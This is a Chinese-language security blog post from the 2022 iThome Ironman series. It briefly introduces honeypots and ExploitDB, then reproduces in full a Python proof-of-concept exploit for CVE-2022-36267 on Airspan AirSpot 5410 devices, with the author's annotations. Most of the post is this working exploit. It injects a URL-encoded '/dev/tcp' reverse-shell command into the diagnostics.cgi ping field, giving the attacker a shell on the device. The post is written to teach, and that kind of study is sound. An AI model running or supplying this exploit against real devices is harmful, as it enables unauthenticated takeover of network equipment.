[Day 15] 情報搜集工具-honeypot、ExploitDB

2022 iThome 鐵人賽

DAY 15

Security

不想上班系列系列第 15 篇

14th鐵人賽

Sunny

2022-09-26 18:16:18

1027 瀏覽

分享至

Honeypot

特別架設的模仿正式機的系統，主要是將資源放在駭客容易找到的環境，並中控這些蜜罐。誘捕攻擊者前來攻擊，進而分析攻擊手段及如何防禦
- 網際網路上一直都有攻擊者不停掃描無限制範圍的共用環境，例如nfs公共環境無設限制IP則全球可讀，鎖定IP後即可暴力破解帳號密碼

ExploitDB

弱點資料庫

Sample:

以Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)為例
- Remote Code Execution(遠端命令執行)，代表可在瀏覽器上提交執行命令，使攻擊者可以執行任何命令或更改code
- 通常為高風險等級
下面為作者提供的範例code，示範如何做出RCE攻擊

"""
 作者介紹code的用意
"""

# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def banner():
  airspanLogo = """ 
      ,-.
     / \  `.  __..-,O
    :   \ --''_..-'.'
    |    . .-' `. '.
    :     .     .`.'
     \     `.  /  ..
      \      `.   ' .
       `,       `.   \
      ,|,`.        `-.\
     '.||  ``-...__..-`
      |  | Airspan 
      |__| AirSpot 5410
      /||\ PWNED x_x
     //||\\
    // || \\
 __//__||__\\__
'--------------'Necrum Security Labs

\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                 
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

"""
測試是否可以進行遠程連接
"""
def pingWebInterface(RHOST, RPORT):
  url = 'https://{}:{}'.format(RHOST, RPORT)
  try:
    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
    if response.status_code != 200:
      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
      exit()
    print('[INFO] Airspan device web interface seems reachable!')
  except:
    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
    exit()


"""
Reverse Shell
在目標主機上對攻擊主機發起連線

設定好payload&query，打request過去，target ip用了CloudFlare的1.1.1.1，若是有回應代表可進行遠程連接
"""
def execReverseShell(RHOST, RPORT, LHOST, LPORT):
  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
  try:
    print('[INFO] Executing reverse shell...')
    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
    return
  except Exception as e:
      print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
      return False

def main():
  banner()
  args = parser.parse_args()
  pingWebInterface(args.RHOST, args.RPORT)
  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
  main()